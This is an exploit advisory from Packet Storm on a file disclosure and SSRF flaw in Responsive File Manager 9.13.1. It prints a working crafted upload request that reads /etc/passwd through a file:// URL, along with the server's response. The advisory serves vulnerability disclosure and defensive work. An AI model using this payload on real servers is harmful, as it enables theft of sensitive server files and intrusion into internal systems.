Twenty Year Anniversary

Responsive File Manager 9.13.1 File Disclosure

Responsive File Manager 9.13.1 File Disclosure
Posted Aug 8, 2018
Authored by Silton Santos

Responsive File Manager 9.13.1 suffers from a file disclosure vulnerability.

tags | exploit, info disclosure
MD5 | e6654d43dad5be76d71dc9d6bc5269d0

Responsive File Manager 9.13.1 File Disclosure

Change Mirror Download
Responsive Filemanager v 9.13.1 [1]
Author: Silton Santos

=====[ Table of Contents ]===================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References

=====[ Overview ]===================================

* System affected : Responsive Filemanager
* Software Version : 9.13.1 (other versions may also be affected).
* Impact : Get sensitive files from the server.

=====[ Detailed description ]===================================

1. Submit an upload request via the "FROM URL" and intercept with any proxy;
2. Change the parameter "url" to file:///{server_files}, in this example,
the parameter "url" was changed to file:///etc/passwd;

POST /filemanager/upload.php HTTP/1.1
Host: www.[...]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 27
Cookie: last_position=testess%2F; PHPSESSID=nl9pl5vthknvec92bji990krj0
Connection: close

fldr=testess%2F&url=file:///etc/passwd

3.Wait for the answer, if everything is ok, you'll get a response similar
to this:

{"files":[{"name":"passwd.txt","size":1612,"type":null,"path":"\/usr\/share\/tinymce\/www\/filemanager\/..\/source\/testess\/passwd.txt","url":"http:\/\/[...]\/source\/testess\/passwd.txt","deleteUrl":"http:\/\/[...]\/filemanager\/upload.php?file=passwd.txt","deleteType":"DELETE"}]}

4. Done, access the folder inserted in the "fldr" parameter and you can be
able to download the file from folder.

P.S:If the answer is similar to the following, possibly the user of the
service web, does not have permission on the file. If the size is equal to
0, the file may not exist.

{"files":[{"name":"passwd","size":1573,"type":null,"error":"Filetype not
allowed"}]}

=====[ Aggravating factors ]===================================

This functionality uses the input of the parameter "url" at the function
curl_exec. This function can be used by other protocols, like
smb,ftp,scp,telnet and others, impacting on a SSRF.

=====[ Timeline of disclosure ]===================================

07/17/2018 - Vulnerability reported to developer in two emails. (did not
answer)


=====[ References
]===========================================================

[1] http://www.responsivefilemanager.com/


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close